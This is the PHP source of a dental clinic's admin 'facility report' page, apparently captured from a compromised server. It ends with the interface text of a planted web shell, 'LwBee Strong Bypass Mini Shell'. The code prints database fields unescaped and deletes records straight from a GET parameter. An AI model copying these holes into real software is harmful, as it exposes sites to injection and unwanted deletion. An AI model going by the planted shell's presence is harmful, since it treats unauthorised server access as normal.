/home3/vehiclea/public_html/admin-vishnudentalclinic-com/facility_report.php
<?php

    session_start();
 $_SESSION['active'] = 'facilityReport';
    include('include/header.php');
    $select = select_facilities();
    if(!empty($_GET['delId'])){
       delete_facility($_GET['delId']);
    }
    
?>
<style>
.button {
  border: none;
  color: white;
  padding: 10px 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}

.button1 {background-color: #4CAF50;} /* Green */
.button2 {background-color: #b71c1c;} /* Blue */
</style>
<script src='https://kit.fontawesome.com/a076d05399.js' crossorigin='anonymous'></script>
<body>

  <!-- ======= Header ======= -->
 

  <!-- ======= Sidebar ======= -->
  
  <main id="main" class="main">

    <div class="pagetitle">
      <h1>FACILITY</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="dashboard.php">Home</a></li>
          <li class="breadcrumb-item">Facility Report</li>
          
        </ol>
      </nav>
    </div><!-- End Page Title -->

    <section class="section">
      <div class="row">
        <div class="col-lg-12">

          <div class="card">
            <div class="card-body">
              <h5 class="card-title">Facility Report</h5>
              <?php
                if(!empty($_GET['edit']))
                {
            ?>
              <div align="center" style="color:green;"> <h4>Data Updated Successfully</h4></div>
              <?php
              }
            ?>
              <?php
                if(!empty($_GET['del']))
                {
            ?>
              <div align="center" style="color:green;"> <h4>Data Deleted Successfully</h4></div>
              <?php
              }
            ?>
              <!-- Table with stripped rows -->
              <table class="table datatable">
                <thead>
                  <tr>
                    <th scope="col">#</th>
                    <th scope="col">Name</th>
                    <th scope="col">Description</th>
                    <th scope="col">Image</th>
                    <th scope="col">Status</th>
                    <th scope="col">Action</th>
                  </tr>
                </thead>
                <tbody>
                 <?php
                 $i=1;
                   while($row = mysqli_fetch_array($select)){
                    
                 ?>
                
                  <tr>
                    <td><?= $i;?></td>
                  <td><?= $row['name']?></td>
                  <td><?= $row['content']?></td>
                  <td><img src="uploads/facility/<?= $row['image']?>" width="50px"></td>
                  <td><?php if($row['status']==1){ echo "Active";}else{ echo "Inactive";}?></td>
                  <td>
      <a href="facility_edit.php?editId=<?= $row['id']?>"><button class="button button1">Edit</button></a>
                    <a href="facility_report.php?delId=<?= $row['id']?>"><button  class="button button2" >Delete</button></a>
                  </td>
                  </tr>
                  <?php $i++;}?>
                </tbody>
              </table>
              <!-- End Table with stripped rows -->

            </div>
          </div>

        </div>
      </div>
    </section>

  </main><!-- End #main -->

  <!-- ======= Footer ======= -->
  <?php
    include('include/footer.php');
  ?>
<!-- <button class="button button1">Green</button>
<button class="button button2">Blue</button> -->


@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File